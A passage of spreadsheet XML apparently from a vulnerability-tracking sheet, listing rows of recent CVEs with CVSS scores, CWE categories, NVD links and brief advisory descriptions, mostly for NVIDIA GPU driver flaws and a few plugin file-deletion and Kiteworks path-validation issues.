        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="inlineStr"/>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr"/>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q354" s="5" t="inlineStr"/>
      <c r="R354" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S354" s="5" t="inlineStr">
        <is>
          <t>Editor Arbitrary File Deletion in Template Kit – Import &lt;= 1.0.16 versions.</t>
        </is>
      </c>
      <c r="T354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96824</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97242</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="inlineStr"/>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr"/>
      <c r="K355" s="5" t="inlineStr"/>
      <c r="L355" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q355" s="5" t="inlineStr"/>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S355" s="5" t="inlineStr">
        <is>
          <t>Author Arbitrary File Deletion in WEBO MCP &lt;= 3.0.18 versions.</t>
        </is>
      </c>
      <c r="T355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97242</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102141</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="inlineStr"/>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr"/>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q356" s="5" t="inlineStr"/>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-73</t>
        </is>
      </c>
      <c r="S356" s="5" t="inlineStr">
        <is>
          <t>Two Kiteworks Core cluster-management operations did not validate file paths supplied to them, so an attacker holding root on one node of a cluster could write files as root onto another node and cause them to be executed there. Exploitation requires backend root access on a cluster node and a pending software patch present on the target node.</t>
        </is>
      </c>
      <c r="T356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102141</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47509</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="inlineStr"/>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr"/>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q357" s="5" t="inlineStr"/>
      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S357" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver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357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47509</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47515</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="inlineStr"/>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr"/>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q358" s="5" t="inlineStr"/>
      <c r="R358" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S358" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause an out-of-bounds read via an unbounded string operation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47515</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47522</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="inlineStr"/>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr"/>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q359" s="5" t="inlineStr"/>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S359" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause improper input validation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47522</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47524</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="inlineStr"/>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr"/>
      <c r="K360" s="5" t="inlineStr"/>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q360" s="5" t="inlineStr"/>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S360" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47524</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47525</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="inlineStr"/>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr"/>
      <c r="K361" s="5" t="inlineStr"/>
      <c r="L361" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q361" s="5" t="inlineStr"/>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="S361" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause an improper validation of an array index. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47525</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47527</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="inlineStr"/>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr"/>
      <c r="K362" s="5" t="inlineStr"/>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q362" s="5" t="inlineStr"/>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S362" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the firmware where an attacker could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47527</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47529</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="inlineStr"/>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr"/>
      <c r="K363" s="5" t="inlineStr"/>
      <c r="L363" s="5" t="inlineStr"/>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q363" s="5" t="inlineStr"/>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S363" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47529</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47532</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="inlineStr"/>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr"/>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q364" s="5" t="inlineStr"/>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S364"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364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47532</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47533</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="inlineStr"/>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr"/>
      <c r="K365" s="5" t="inlineStr"/>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q365" s="5" t="inlineStr"/>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="S365" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause an improper validation of an array index. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47533</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47537</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="inlineStr"/>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr"/>
      <c r="K366" s="5" t="inlineStr"/>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q366" s="5" t="inlineStr"/>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S366" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47537</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47538</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="inlineStr"/>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr"/>
      <c r="K367" s="5" t="inlineStr"/>
      <c r="L367" s="5" t="inlineStr"/>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q367" s="5" t="inlineStr"/>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S367" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the firmware where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47538</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47539</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="inlineStr"/>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr"/>
      <c r="K368" s="5" t="inlineStr"/>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q368" s="5" t="inlineStr"/>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="S368" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager for Linux contains a vulnerability in the kernel mode layer where an attacker could cause an incorrect numeric conversion. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47539</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47542</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="inlineStr"/>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr"/>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q369" s="5" t="inlineStr"/>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S369" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause improper input validation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47542</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47543</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="inlineStr"/>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr"/>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q370" s="5" t="inlineStr"/>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S370" s="5" t="inlineStr">
        <is>
          <t>VIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause improper input validation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47543</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47544</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>6.7</v>
